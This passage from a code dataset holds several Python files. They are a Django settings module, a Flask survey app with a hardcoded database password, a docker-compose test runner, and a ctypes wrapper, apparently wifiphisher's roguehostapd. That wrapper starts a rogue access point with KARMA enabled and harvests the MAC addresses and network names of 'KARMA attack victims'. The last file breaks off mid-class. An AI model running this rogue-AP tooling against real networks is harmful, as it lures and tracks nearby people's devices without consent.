= '{0}/api/'.format(SERVER_URL)\nLIVEWHALE_API_URL = 'https://{0}'.format(SERVER_URL)\nSTATIC_URL = 'https://{0}/static/djmapache/'.format(SERVER_URL)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nROOT_DIR = os.path.dirname(__file__)\nPROJECT_APP = os.path.basename(BASE_DIR)\nADMIN_MEDIA_PREFIX = '/static/admin/'\nROOT_URL = '/djmapache/'\nADMIN_MEDIA_PREFIX = '/static/admin/'\nMEDIA_ROOT = '{0}/assets/'.format(ROOT_DIR)\nSTATIC_ROOT = '{0}/static/'.format(ROOT_DIR)\nSTATIC_URL = '/static/{0}/'.format(PROJECT_APP)\nMEDIA_URL = '/media/{0}/'.format(PROJECT_APP)\nUPLOADS_DIR = '{0}files/'.format(MEDIA_ROOT)\nUPLOADS_URL = '{0}files/'.format(MEDIA_URL)\nROOT_URLCONF = 'djmapache.core.urls'\nWSGI_APPLICATION = 'djmapache.wsgi.application'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\nINSTALLED_APPS = [\n 'bootstrap4',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.humanize',\n 'django.contrib.messages',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n 'djmapache.core',\n # needed for template tags\n 'djtools',\n # honeypot for admin attacks\n 'admin_honeypot',\n # sign in as a user\n 'loginas',\n]\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n# template stuff\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n '/data2/django_templates/djbootmin/',\n '/data2/django_templates/djcher/',\n '/data2/django_templates/django-djskins/',\n '/data2/livewhale/includes/',\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'debug': DEBUG,\n 'context_processors': [\n 'djtools.context_processors.sitevars',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n# caching\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'LOCATION': '127.0.0.1:11211',\n 'TIMEOUT': 60 * 60 * 24,\n 'KEY_PREFIX': 'djmapache_',\n },\n}\n# LDAP Constants\nLDAP_SERVER = ''\nLDAP_SERVER_PWM = ''\nLDAP_PORT = ''\nLDAP_PORT_PWM = ''\nLDAP_PROTOCOL = ''\nLDAP_PROTOCOL_PWM = ''\nLDAP_BASE = ''\nLDAP_USER = ''\nLDAP_PASS = ''\nLDAP_EMAIL_DOMAIN = ''\nLDAP_OBJECT_CLASS = ''\nLDAP_OBJECT_CLASS_LIST = []\nLDAP_GROUPS = {}\nLDAP_RETURN = []\nLDAP_RETURN_PWM = []\nLDAP_ID_ATTR = ''\nLDAP_CHALLENGE_ATTR = ''\nLDAP_AUTH_USER_PK = False\n# auth backends\nAUTHENTICATION_BACKENDS = (\n 'djauth.backends.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\nSAML_FOLDER = os.path.join(BASE_DIR, 'saml')\n# login/logout\nLOGIN_URL = '{}accounts/login/'.format(ROOT_URL)\nLOGOUT_REDIRECT_URL = '{}accounts/loggedout/'.format(ROOT_URL)\nLOGIN_REDIRECT_URL = ROOT_URL\n# needed for backwards compatability\nLOGOUT_URL = LOGOUT_REDIRECT_URL\nUSE_X_FORWARDED_HOST = True\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\nSESSION_COOKIE_DOMAIN = '.carthage.edu'\nSESSION_COOKIE_NAME = 'django_djmapache_cookie'\nSESSION_COOKIE_AGE = 86400\n# SMTP settings\nEMAIL_HOST = ''\nEMAIL_HOST_USER = ''\nEMAIL_HOST_PASSWORD = ''\nEMAIL_USE_TLS = True\nEMAIL_PORT = 587\nEMAIL_FAIL_SILENTLY = False\nDEFAULT_FROM_EMAIL = ''\nSERVER_EMAIL = ''\nSERVER_MAIL = ''\nREQUIRED_ATTRIBUTE = True\n# logging\nLOG_FILEPATH = os.path.join(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'logs/',\n)\nDEBUG_LOG_FILENAME = LOG_FILEPATH + 'debug.log'\nINFO_LOG_FILENAME = LOG_FILEPATH + 'info.log'\nERROR_LOG_FILENAME = LOG_FILEPATH + 'error.log'\nCUSTOM_LOG_FILENAME = LOG_FILEPATH + 'custom.log'\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s',\n 'datefmt': '%Y/%b/%d %H:%M:%S',\n },\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',\n 'datefmt': '%Y/%b/%d %H:%M:%S',\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s',\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse',\n },\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'handlers': {\n 'logfile': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': LOG_FILENAME,\n 'formatter': 'standard',\n },\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard',\n },\n 'mail_admins': {\n 'level': 'ERROR',\n #'filters': ['require_debug_false'],\n 'include_html': True,\n 'class': 'django.utils.log.AdminEmailHandler',\n },\n },\n 'loggers': {\n 'custom_logfile': {\n 'level': 'ERROR',\n 'class': 'logging.FileHandler',\n 'filename': CUSTOM_LOG_FILENAME,\n 'formatter': 'custom',\n },\n 'info_logfile': {\n 'level': 'INFO',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'backupCount': 10,\n 'maxBytes': 50000,\n 'filename': INFO_LOG_FILENAME,\n 'formatter': 'simple',\n },\n 'debug_logfile': {\n 'level': 'DEBUG',\n 'handlers': ['logfile'],\n 'class': 'logging.FileHandler',\n 'filename': DEBUG_LOG_FILENAME,\n 'formatter': 'verbose',\n },\n 'error_logfile': {\n 'level': 'ERROR',\n 'class': 'logging.FileHandler',\n 'filename': ERROR_LOG_FILENAME,\n 'formatter': 'verbose',\n },\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n 'level': 'WARN',\n },\n 'django.db.backends': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n },\n}\n\n# PacketFence Apps\nPACKETFENCE_API_EARL = ''\nPACKETFENCE_USERNAME = ''\nPACKETFENCE_PASSWORD = ''\nPACKETFENCE_LOGIN_ENDPOINT = ''\nPACKETFENCE_REPORTS_ENDPOINT = ''\nPACKETFENCE_IP4LOGS_ENDPOINT = ''\nPACKETFENCE_NODE_ENDPOINT = ''\n# Handshake Application\nHANDSHAKE_CSV_OUTPUT = ''\nHANDSHAKE_CSV_ARCHIVED = ''\nHANDSHAKE_TO_EMAIL = []\nHANDSHAKE_FROM_EMAIL = ''\nHANDSHAKE_ACCESS_KEY = ''\nHANDSHAKE_SECRET = ''\nHANDSHAKE_BUCKET = ''\nHANDSHAKE_S3_FOLDER = ''\n# scripsafe\n#\n# external scripsafe server\nSCRIP_SAFE_XTRNL_SERVER = ''\nSCRIP_SAFE_XTRNL_USER = ''\nSCRIP_SAFE_XTRNL_KEY = '{0}/scripsafe_rsa'.format(BASE_DIR)\n# server on which our transcrip reside\nSCRIP_SAFE_LOCAL_SERVER = ''\nSCRIP_SAFE_LOCAL_USER = ''\nSCRIP_SAFE_LOCAL_KEY = '{0}/carsu_rsa'.format(BASE_DIR)\nSCRIP_SAFE_LOCAL_SPOOL = ''\nSCRIP_SAFE_LOCAL_BACKUP = ''\nSCRIP_SAFE_LOCAL_PATH = ''\n# transcrip file names start with 'cfa'\nSCRIP_SAFE_FILE_PREFIX = 'cfa'\n# SFTP connection dictionaries\nSCRIP_SAFE_XTRNL_CONNECTION = {\n 'host': SCRIP_SAFE_XTRNL_SERVER,\n 'username': SCRIP_SAFE_XTRNL_USER,\n 'private_key': SCRIP_SAFE_XTRNL_KEY,\n}\nSCRIP_SAFE_LOCAL_CONNECTION = {\n 'host': SCRIP_SAFE_LOCAL_SERVER,\n 'username': SCRIP_SAFE_LOCAL_USER,\n 'private_key': SCRIP_SAFE_LOCAL_KEY,\n}\n# pdf settings\nSCRIP_SAFE_FONT_SIZE = 7.5\nSCRIPT_SAFE_LEADING = 10\nSCRIP_SAFE_RIGHT_MARGIN = 0.25\nSCRIP_SAFE_LEFT_MARGIN = 0.075\nSCRIP_SAFE_TOP_MARGIN = 0.40\nSCRIP_SAFE_BOTTOM_MARGIN = 0.40\n# Terradotta\nTERRADOTTA_HOST = ''\nTERRADOTTA_USER = ''\nTERRADOTTA_PKEY = ''\nTERRADOTTA_PASS = ''\nTERRADOTTA_CSV_OUTPUT = ''\n# oclc\n# external oclc server\nOCLC_XTRNL_SRVR = ''\nOCLC_XTRNL_USER = ''\nOCLC_XTRNL_PASS = ''\nOCLC_XTRNL_PATH = ''\nOCLC_LOCAL_PATH = ''\n# SFTP connection dictionaries\nOCLC_XTRNL_CONNECTION = {\n 'host': OCLC_XTRNL_SRVR,\n 'username': OCLC_XTRNL_USER,\n 'password': OCLC_XTRNL_PASS,\n}\n# oclc\nOCLC_TO_EMAIL = []\nOCLC_FROM_EMAIL = ''\nOCLC_GROUPINDEX_LIST_INDEX = 12\n# external oclc server\nOCLC_ENSXTRNL_SRVR = ''\nOCLC_ENSXTRNL_USER = ''\nOCLC_ENSXTRNL_PASS = ''\nOCLC_ENSXTRNL_PATH = ''\nOCLC_ENSLOCAL_PATH = ''\n# SFTP connection dictionaries\nOCLC_ENSXTRNL_CONNECTION = {\n 'host': OCLC_ENSXTRNL_SRVR,\n 'username': OCLC_ENSXTRNL_USER,\n 'password': OCLC_ENSXTRNL_PASS,\n}\n# Barnes and Noble AIP\nBARNESNOBLE_AIP_HOST = ''\nBARNESNOBLE_AIP_USER = ''\nBARNESNOBLE_AIP_PORT = ''\nBARNESNOBLE_AIP_HOME = ''\nBARNESNOBLE_AIP_DATA = ''\nBARNESNOBLE_AIP_KEY = ''\n# Barnes and Noble 1\nBARNESNOBLE1_HOST = ''\nBARNESNOBLE1_USER = ''\nBARNESNOBLE1_PKEY = ''\nBARNESNOBLE1_PASS = ''\nBARNESNOBLE1_PORT = 0\n# Barnes and Noble 2\nBARNESNOBLE2_HOST = ''\nBARNESNOBLE2_USER = ''\nBARNESNOBLE2_PKEY = ''\nBARNESNOBLE2_PASS = ''\nBARNESNOBLE2_PORT = 0\n#\nBARNESNOBLE_CSV_OUTPUT = ''\nBARNESNOBLE_CSV_ARCHIVED = ''\nBARNESNOBLE_TO_EMAIL = []\nBARNESNOBLE_FROM_EMAIL = ''\n#\nBARNES_N_NOBLE_CSV_OUTPUT = ''\nBARNES_N_NOBLE_TO_EMAIL = []\nBARNES_N_NOBLE_FROM_EMAIL = ''\n# Package Concierge\nCONCIERGE_HOST = ''\nCONCIERGE_USER = ''\nCONCIERGE_PASS = ''\nCONCIERGE_PORT = 0\nCONCIERGE_CSV_OUTPUT = ''\nCONCIERGE_CSV_ARCHIVED = ''\nCONCIERGE_TO_EMAIL = []\nCONCIERGE_FROM_EMAIL = ''\n# maxient\nMAXIENT_HOST = ''\nMAXIENT_USER = ''\nMAXIENT_PKEY = ''\nMAXIENT_PASS = ''\nMAXIENT_CSV_OUTPUT = ''\nMAXIENT_TO_EMAIL = []\nMAXIENT_FROM_EMAIL = ''\nMAXIENT_HEADERS = [\n 'Carthage ID',\n 'Username',\n 'Last Name',\n 'First Name',\n 'Middle Name',\n 'Date of Birth',\n 'Gender',\n 'Ethnicity',\n 'Building',\n 'Room Number',\n 'Local Mailing Address',\n 'Local City',\n 'Local State',\n 'Local Zip',\n 'Local Phone',\n 'Cell Phone',\n 'Permanent Address',\n 'Permanent City',\n 'Permanent State',\n 'Permanent Zip',\n 'Permanent Country',\n 'Permanent Phone',\n 'Emergency Contact',\n 'Email Address',\n 'Classification',\n 'Academic Major',\n 'Academic Advisor',\n 'GPA Recent',\n 'GPA Cumulative',\n 'Athlete',\n 'Greek',\n 'Honors',\n 'ROTC Vet',\n 'Last Update',\n]\n# Everbridge\nEVERBRIDGE_HOST = ''\nEVERBRIDGE_USER = ''\nEVERBRIDGE_PKEY = ''\nEVERBRIDGE_CSV_OUTPUT = ''\nEVERBRIDGE_TO_EMAIL = []\nEVERBRIDGE_FROM_EMAIL = ''\nEVERBRIDGE_FACSTAFF_HEADERS = [\n 'First Name',\n 'Middle Initial',\n 'Last Name',\n 'Suffix',\n 'External ID',\n 'SSO User ID',\n 'Country',\n 'Business Name',\n 'Record Type',\n 'Phone 1',\n 'Phone Country 1',\n 'Phone 2',\n 'Phone Country 2',\n 'Email Address 1',\n 'Email Address 2',\n 'SMS 1',\n 'SMS 1 Country',\n 'Custom Field 1',\n 'Custom Value 1',\n 'Custom Field 2',\n 'Custom Value 2',\n 'Custom Field 3',\n 'Custom Value 3',\n 'END',\n]\nEVERBRIDGE_STUDENT_HEADERS = [\n 'First Name',\n 'Middle Initial',\n 'Last Name',\n 'Suffix',\n 'External ID',\n 'SSO User ID',\n 'Country',\n 'Business Name',\n 'Record Type',\n 'Phone 1',\n 'Phone Country 1',\n 'Email Address 1',\n 'Email Address 2',\n 'SMS 1',\n 'SMS 1 Country',\n 'Custom Field 1',\n 'Custom Value 1',\n 'Custom Field 2',\n 'Custom Value 2',\n 'Custom Field 3',\n 'Custom Value 3',\n 'Custom Field 4',\n 'Custom Value 4',\n 'Custom Field 5',\n 'Custom Value 5',\n 'Custom Field 6',\n 'Custom Value 6',\n 'END',\n]\n# Papercut\nPAPERCUT_CSV_OUTPUT = ''\nPAPERCUT_CSV_ARCHIVED = ''\nPAPERCUT_TO_EMAIL = []\nPAPERCUT_FROM_EMAIL = ''\nPAPERCUT_BCC_EMAIL = ''\n# Common Application\nCOMMONAPP_HOST = ''\nCOMMONAPP_USER = ''\nCOMMONAPP_PKEY = ''\nCOMMONAPP_PASS = ''\nCOMMONAPP_CSV_OUTPUT = ''\nCOMMONAPP_CSV_ARCHIVED = ''\nCOMMONAPP_TO_EMAIL = []\nCOMMONAPP_FROM_EMAIL = ''\n# OrgSync\nORGSYNC_HOST = ''\nORGSYNC_USER = ''\nORGSYNC_PKEY = ''\nORGSYNC_PASS = ''\nORGSYNC_CSV_OUTPUT = ''\nORGSYNC_TO_EMAIL = []\nORGSYNC_FROM_EMAIL = ''\n# Neptune\nNEPTUNE_EARL = ''\n# suitable\nSUITABLE_USERNAME = ''\nSUITABLE_PASSWORD = ''\nSUITABLE_SERVER = ''\nSUITABLE_SUITABLE_INSTITUTION_ID = ''\nSUITABLE_CSV_OUTPUT = ''\nSUITABLE_BOUNDARY = ''\n\n##################\n# LOCAL SETTINGS #\n##################\n\n# Allow any settings to be defined in local.py which should be\n# ignored in your version control system allowing for settings to be\n# defined per machine.\n\n# Instead of doing \"from .local import *\", we use exec so that\n# local has full access to everything defined in this module.\n# Also force into sys.modules so it's visible to Django's autoreload.\n\nphile = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'local.py')\nif os.path.exists(phile):\n import imp\n import sys\n module_name = '{0}.settings.local'.format(PROJECT_APP)\n module = imp.new_module(module_name)\n module.__file__ = phile\n sys.modules[module_name] = module\n exec(open(phile, 'rb').read())\n","sub_path":"djmapache/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"383574363","text":"from flask import Flask, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom send_email import send_email\nfrom sqlalchemy import func\n\napp = Flask(__name__)\ndb = SQLAlchemy(app)\n\napp.config['SQLALCHEMY_DATABASE_URI']='postgresql://postgres:3682@localhost/test'\ndb=SQLAlchemy(app)\n\nclass Data(db.Model):\n __tablename__=\"data\"\n id=db.Column(db.Integer, primary_key=True)\n email_=db.Column(db.String(120), unique=True)\n height_=db.Column(db.Integer)\n\n def __init__(self, email_, height_):\n self.email_=email_\n self.height_=height_\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/success/\", methods=['POST'])\ndef success():\n if request.method == 'POST':\n email = request.form[\"email\"]\n height = request.form[\"height\"]\n data= Data(email,height)\n if db.session.query(Data).filter(Data.email_== email).count() == 0:\n db.session.add(data)\n db.session.commit()\n avgerage_height = db.session.query(func.avg(Data.height_)).scalar()\n avgerage_height = round(avgerage_height,1)\n count = db.session.query(Data.height_).count()\n send_email(email,height, avgerage_height, count)\n return render_template(\"success.html\")\n return render_template(\"index.html\", text=\"Email Is Already Exists\")\n\nif __name__ == \"__main__\":\n app.debig=True\n app.run()","sub_path":"Application_9/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"646276406","text":"import os\nimport signal\n\nfrom hokusai.lib.command import command\nfrom hokusai.lib.config import config\nfrom hokusai.lib.common import print_green, shout, EXIT_SIGNALS\nfrom hokusai.lib.exceptions import CalledProcessError, HokusaiError\n\n@command()\ndef test(build, cleanup):\n docker_compose_yml = os.path.join(os.getcwd(), 'hokusai/test.yml')\n if not os.path.isfile(docker_compose_yml):\n raise HokusaiError(\"Yaml file %s does not exist.\" % docker_compose_yml)\n\n def on_cleanup(*args):\n shout(\"docker-compose -f %s -p hokusai stop\" % docker_compose_yml)\n shout(\"docker-compose -f %s -p hokusai rm --force\" % docker_compose_yml)\n\n if cleanup:\n for sig in EXIT_SIGNALS:\n signal.signal(sig, on_cleanup)\n\n opts = ' --abort-on-container-exit'\n if build:\n opts += ' --build'\n\n print_green(\"Starting test environment... Press Ctrl+C to stop.\")\n try:\n shout(\"docker-compose -f %s -p hokusai up%s\" % (docker_compose_yml, opts), print_output=True)\n return_code = int(shout(\"docker wait hokusai_%s_1\" % config.project_name))\n except CalledProcessError:\n if cleanup: on_cleanup()\n raise HokusaiError('Tests Failed')\n\n if return_code:\n raise HokusaiError('Tests Failed - Exit Code: %s\\n' % return_code, return_code=return_code)\n else:\n print_green(\"Tests Passed\")\n\n if cleanup: on_cleanup()\n\n return return_code\n","sub_path":"hokusai/commands/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382037113","text":"#!/usr/bin/env python2\n\"\"\"\nThis module was made to wrap the hostapd\n\"\"\"\n\nimport os\nimport threading\nimport collections\nimport ctypes\nimport re\nimport roguehostapd.hostapd_constants as hostapd_constants\n\n\nclass KarmaData(ctypes.Structure):\n \"\"\"\n Handle the hostapd return mac/ssid data\n \"\"\"\n pass\n\n\nKarmaData._fields_ = [\n (\"is_assoc\", ctypes.c_ubyte),\n (\"ssid_len\", ctypes.c_size_t),\n (\"ssid\", ctypes.c_ubyte * 32),\n (\"mac_addr\", ctypes.c_ubyte * 6),\n (\"next_data\", ctypes.POINTER(KarmaData))]\n\n\nclass HostapdConfig(object):\n \"\"\"\n Handle the Hostapd configuration\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Setup the class with all the given arguments\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :return: None\n :rtype: None\n \"\"\"\n\n # configurations for hostapd.conf\n self.configuration_dict = collections.defaultdict()\n # initialize the hostapd configuration\n self.initialize_hostapd_config()\n\n # configuration for hostapd command line options\n self.options = {\n 'debug_level': None,\n 'key_data': None,\n 'timestamp': None,\n 'version': None,\n 'mute': None,\n # Disable the eloop terminate in hostapd and control by\n # wifiphisher\n 'eloop_term_disable': None,\n }\n\n # custom action and relies on transformation by roguehostapd\n self.custom_action = {\n # the deny mac addresses\n 'deny_macs': self.update_black_macs,\n }\n # hostapd debug level\n self.debug_level = hostapd_constants.HOSTAPD_DEBUG_OFF\n\n def initialize_hostapd_config(self):\n \"\"\"\n Parse the hostapd.conf file in the hostapd source code and\n update to the attribute configuation_dict\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :return: None\n :rtype: None\n \"\"\"\n\n work_dir = os.path.dirname(os.path.abspath(__file__))\n hostapd_config = os.path.join(work_dir,\n hostapd_constants.HOSTAPD_DIR,\n 'hostapd.conf')\n # initialize the hostapd configuration dictionary\n with open(hostapd_config, 'r') as filep:\n for line in filep:\n m_obj = re.match(r'#([\\S-]+)=[\\S-].*$', line)\n if m_obj:\n key = m_obj.group(1)\n self.configuration_dict[key] = ''\n # initialize the basic information\n self.configuration_dict['ssid'] = hostapd_constants.SSID\n self.configuration_dict['channel'] = hostapd_constants.CHANNEL\n self.configuration_dict['beacon_int'] = hostapd_constants.BEACON_INT\n self.configuration_dict['hw_mode'] = hostapd_constants.HW_MODE\n self.configuration_dict['interface'] = hostapd_constants.INTERFACE\n self.configuration_dict['karma_enable'] = hostapd_constants.KARMA_ENABLE\n self.configuration_dict['deny_macs'] = []\n\n def update_black_macs(self, output_fp):\n \"\"\"\n Update the black mac addresses for hostapd\n\n :param self: A HostapdConfig object\n :param output_fp: Output file pointer\n :type self: HostapdConfig\n :type output_fp: file\n :return: None\n :rtype: None\n \"\"\"\n\n output_fp.write('macaddr_acl=0\\n')\n output_fp.write('deny_mac_file='+hostapd_constants.DENY_MACS_PATH+'\\n')\n with open(hostapd_constants.DENY_MACS_PATH, 'w') as writer:\n for mac_addr in self.configuration_dict['deny_macs']:\n writer.write(mac_addr+'\\n')\n\n def update_wps_configuration(self):\n \"\"\"\n Update the WPS configuration for hostapd\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :return: None\n :rtype: None\n \"\"\"\n\n # enable WPS\n self.configuration_dict['wps_state'] = '2'\n self.configuration_dict['ap_setup_locked'] = '1'\n self.configuration_dict['uuid'] = '12345678-9abc-def0-1234-56789abcdef0'\n self.configuration_dict['device_name'] = 'Wireless AP'\n self.configuration_dict['manufacturer'] = 'Company'\n self.configuration_dict['model_name'] = 'WAP'\n self.configuration_dict['model_number'] = '123'\n self.configuration_dict['serial_number'] = '12345'\n self.configuration_dict['device_type'] = '6-0050F204-1'\n self.configuration_dict['os_version'] = '01020300'\n self.configuration_dict['config_methods'] =\\\n 'label virtual_display virtual_push_button keypad'\n self.configuration_dict['eap_server'] = '1'\n\n def update_security_info(self, config_dict):\n \"\"\"\n Update the security configuration if passphrase is specified\n\n :param self: A HostapdConfig object\n :param config_dict: hostapd configuration dictionary\n :type self: HostapdConfig\n :type config_dict: dict\n :return: None\n :rtype: None\n \"\"\"\n\n # update WPS information\n self.update_wps_configuration()\n\n if 'wpa_passphrase' in config_dict and config_dict['wpa_passphrase']:\n self.configuration_dict['wpa_key_mgmt'] = \"WPA-PSK\"\n self.configuration_dict['wpa_pairwise'] = \"TKIP CCMP\"\n self.configuration_dict['wpa'] = '3'\n\n def update_configs(self, config_dict):\n \"\"\"\n Update the attributes based on the configuration dictionary\n\n :param self: A HostapdConfig object\n :param config_dict: hostapd configuration dictionary\n :type self: HostapdConfig\n :type config_dict: dict\n :return: None\n :rtype: None\n \"\"\"\n\n for key, value in config_dict.iteritems():\n if (key in self.configuration_dict) and value:\n self.configuration_dict[key] = value\n elif key not in self.configuration_dict:\n raise KeyError('Unsupported hostapd configuation!')\n\n self.update_security_info(config_dict)\n\n def _update_debug_level(self, options):\n \"\"\"\n Update the debug level from options dictionary\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :param options: configurations for command line options\n :type options: dict\n :return: None\n :rtype: None\n \"\"\"\n self.debug_level = options['debug_level']\n if self.debug_level == hostapd_constants.HOSTAPD_DEBUG_VERBOSE:\n self.options['debug_level'] = tuple(['-ddd'])\n\n def update_options(self, options):\n \"\"\"\n Update the comand line options\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :param options: configurations for command line options\n :type options: dict\n :return: None\n :rtype: None\n ..note: update the command line options\n \"\"\"\n\n for key in options:\n if key in self.options and options[key]:\n if key == 'debug_level':\n self._update_debug_level(options)\n elif key == 'key_data':\n self.options[key] = tuple(['-K'])\n elif key == 'timestamp':\n self.options[key] = tuple(['-t'])\n elif key == 'version':\n self.options[key] = tuple(['-v'])\n elif key == 'mute':\n self.options[key] = tuple(['-s'])\n elif key == 'eloop_term_disable':\n self.options[key] = tuple(['-E'])\n\n def write_configs(self, config_dict, options):\n \"\"\"\n Write the configurations to the file\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :param config_dict: configurations for hostapd.conf\n :type config_dict: dict\n :param options: hostapd command line options\n :type options: dict\n :return: None\n :rtype: None\n ..note: write the configuration file in the path /tmp/hostapd.conf\n \"\"\"\n\n self.update_options(options)\n self.update_configs(config_dict)\n with open(hostapd_constants.HOSTAPD_CONF_PATH, 'w') as conf:\n for key, value in self.configuration_dict.iteritems():\n if value:\n if key not in self.custom_action:\n conf.write(key + '=' + str(value) + '\\n')\n else:\n # callback for the custom action\n self.custom_action[key](conf)\n\n @classmethod\n def is_ssid_valid(cls, ssid):\n \"\"\"\n Check if the specified ssid is valid\n\n :param cls: A HostapdConfig class\n :param ssid: The service set identifier\n :type cls: HostapdConfig class\n :type ssid: str\n :return: True if the ssid is valid\n :rtype: bool\n \"\"\"\n\n return bool(len(ssid) < 33)\n\n\nclass Hostapd(object):\n \"\"\"\n Hostapd wrapper class\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Contruct the class\n\n :param self: A Hostapd object\n :type self: Hostapd\n :return: None\n :rtype: None\n \"\"\"\n\n self.config_obj = None\n self.hostapd_thread = None\n self.hostapd_lib = None\n\n @staticmethod\n def _parse_karma_data(karma_data):\n \"\"\"\n get the associated clients' mac address and essid\n\n :param self: A Hostapd object\n :type self: Hostapd\n :param karma_data: A KarmaData object\n :type karma_data: KarmaData\n\n :return: A list of tuple of essid and mac address tuple\n :rtype: list\n \"\"\"\n\n ret = []\n if karma_data:\n current = karma_data\n while current:\n if current.contents.is_assoc:\n # convert ssid_len to integer\n ssid_len = int(current.contents.ssid_len)\n # convert mac address to string\n mac_addr = current.contents.mac_addr\n mac_l = [format(mac_addr[i], 'x') for i in range(6)]\n mac_str = ':'.join(mac_l)\n\n # convert ssid to string\n ssid_buf = current.contents.ssid\n ssid_list = [ssid_buf[i] for i in range(ssid_len)]\n ssid = ''.join(map(chr, ssid_list))\n ret.append((mac_str, ssid))\n current = current.contents.next_data\n return ret\n\n def get_karma_data(self):\n \"\"\"\n get the data for the KARMA attack victims from hostapd\n\n :param self: A Hostapd object\n :type self: Hostapd\n\n :return: A list of tuple of essid and mac address tuple\n :rtype: list\n \"\"\"\n\n karma_data = self.hostapd_lib.get_assoc_karma_data()\n mac_ssid_pairs = self._parse_karma_data(karma_data)\n return mac_ssid_pairs\n\n def is_alive(self):\n \"\"\"\n API for check if the hostapd thread is running\n :param self: A Hostapd object\n :type self: Hostapd\n :return: True if the hostapd is running else False\n :rtype: bool\n \"\"\"\n return self.hostapd_thread.is_alive()\n\n def start(self, hostapd_config, options):\n \"\"\"\n Start the hostapd process\n\n :param self: A Hostapd object\n :type self: Hostapd\n :param hostapd_config: Hostapd configuration for hostapd.conf\n :type hostapd_config: dict\n :param options: Hostapd command line options\n :type options: dict\n :return: None\n :rtype: None\n ..note: the start function uses ctypes to load the shared library\n of hostapd and use it to call the main function to lunch the AP\n \"\"\"\n\n self.config_obj = HostapdConfig()\n # update the hostapd configuration based on user input\n self.config_obj.write_configs(hostapd_config, options)\n\n work_dir = os.path.dirname(os.path.abspath(__file__))\n exe_path = os.path.join(work_dir, hostapd_constants.HOSTAPD_EXE_PATH)\n shared_lib_path = os.path.join(\n work_dir, hostapd_constants.HOSTAPD_SHARED_LIB_PATH)\n\n config_path = hostapd_constants.HOSTAPD_CONF_PATH\n\n # get the hostapd command to lunch the hostapd\n hostapd_cmd = [exe_path, config_path]\n for key in self.config_obj.options:\n if self.config_obj.options[key]:\n hostapd_cmd += self.config_obj.options[key]\n num_of_args = len(hostapd_cmd)\n str_arr_type = ctypes.c_char_p * num_of_args\n hostapd_cmd = str_arr_type(*hostapd_cmd)\n\n # get the hostapd shared library\n self.hostapd_lib = ctypes.cdll.LoadLibrary(shared_lib_path)\n\n # init hostapd lib info\n self.hostapd_lib.get_assoc_karma_data.restype = ctypes.POINTER(\n KarmaData)\n\n # start the hostapd thread\n self.hostapd_thread = threading.Thread(\n target=self.hostapd_lib.main, args=(len(hostapd_cmd), hostapd_cmd))\n self.hostapd_thread.start()\n\n def stop(self):\n 